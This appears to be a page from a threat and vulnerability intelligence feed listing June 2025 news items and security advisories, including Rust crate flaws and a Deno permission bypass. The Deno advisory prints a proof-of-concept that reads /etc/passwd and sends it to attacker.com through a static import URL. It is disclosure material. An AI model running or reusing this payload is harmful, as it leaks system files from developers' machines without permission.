Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
|
June 5th, 2025 (3 days ago)
|
|
Description: The U.S. Department of State has announced a reward of up to $10 million for any information on government-sponsored hackers with ties to the RedLine infostealer malware operation and its suspected creator, Russian national Maxim Alexandrovich Rudometov. [...]
June 5th, 2025 (3 days ago)
|
|
Description: The United Nations, Carnegie Mellon University, and private organizations are all aiming to train the next generation of cybersecurity experts, boost economies, and disrupt pipelines to armed groups.
June 5th, 2025 (3 days ago)
|
|
Description: For The Council Of LTS Group We have breached your main system Lts.com.vn LTS LAW, a key component of LTS [ā¦]
June 5th, 2025 (3 days ago)
|
|
June 5th, 2025 (3 days ago)
|
|
June 5th, 2025 (3 days ago)
|
|
Description: The following functions in the anon-vec crate are unsound due to insufficient checks on their arguments::
AnonVec::get_ref()
AnonVec::get_mut()
AnonVec::remove_get()
The crate was built as a learning project and is not being maintained.
References
https://github.com/RylanYancey/anon-vec
https://rustsec.org/advisories/RUSTSEC-2025-0039.html
https://github.com/advisories/GHSA-pr59-jjr4-gcf6
June 5th, 2025 (3 days ago)
|
|
|
Description: Affected versions append root to group listings, unless the correct listing has exactly 1024 groups.
This affects both:
The supplementary groups of a user
The group access list of the current process
If the caller uses this information for access control, this may lead to privilege escalation.
This crate is not currently maintained, so a patched version is not available.
Versions older than 0.8.0 do not contain the affected functions, so downgrading to them is a workaround.
Recommended alternatives
uzers (an actively maintained fork of the users crate)
sysinfo
References
https://github.com/ogham/rust-users/issues/44
https://rustsec.org/advisories/RUSTSEC-2025-0040.html
https://github.com/advisories/GHSA-m65q-v92h-cm7q
June 5th, 2025 (3 days ago)
|
|
|
Description: Summary
Static imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network.
Details
Static imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways, when third-party code is directly/indirectly executed with deno run:
The simplest payload would be a tracking pixel-like import that attackers place in their code to find out when developers use the attacker-controlled code.
When --allow-write and --allow-read permissions are given, an attacker can perform a sophisticated two-steps attack: first, they generate a ts/js file containing a static import and in a second execution load this static file.
PoC
const __filename = new URL("", import.meta.url).pathname;
let oldContent = await Deno.readTextFile(__filename);
let passFile = await Deno.readTextFile("/etc/passwd");
let pre =
'import {foo} from "[https://attacker.com?val=](https://attacker.com/?val=)' +
encodeURIComponent(passFile) + '";\n';
await Deno.writeTextFile(__filename, pre + oldContent);
Executing a file containing this payload twice, with deno run --allow-read --allow-write would cause the password file to leak on the network, even though no network permission was granted.
This vulnerability was fixed with the addition of the --allow-import flag: https://docs.deno.com/runtime/fundamentals/security/#network-access
References
https://github.com/denoland/deno/security/advisories/GHSA-jv4x...
June 5th, 2025 (3 days ago)
|
|
Description: The FTC's Andrew Ferguson called on Congress to update federal law to get rid of exceptions for tech firms that handle children's data.
June 5th, 2025 (3 days ago)
|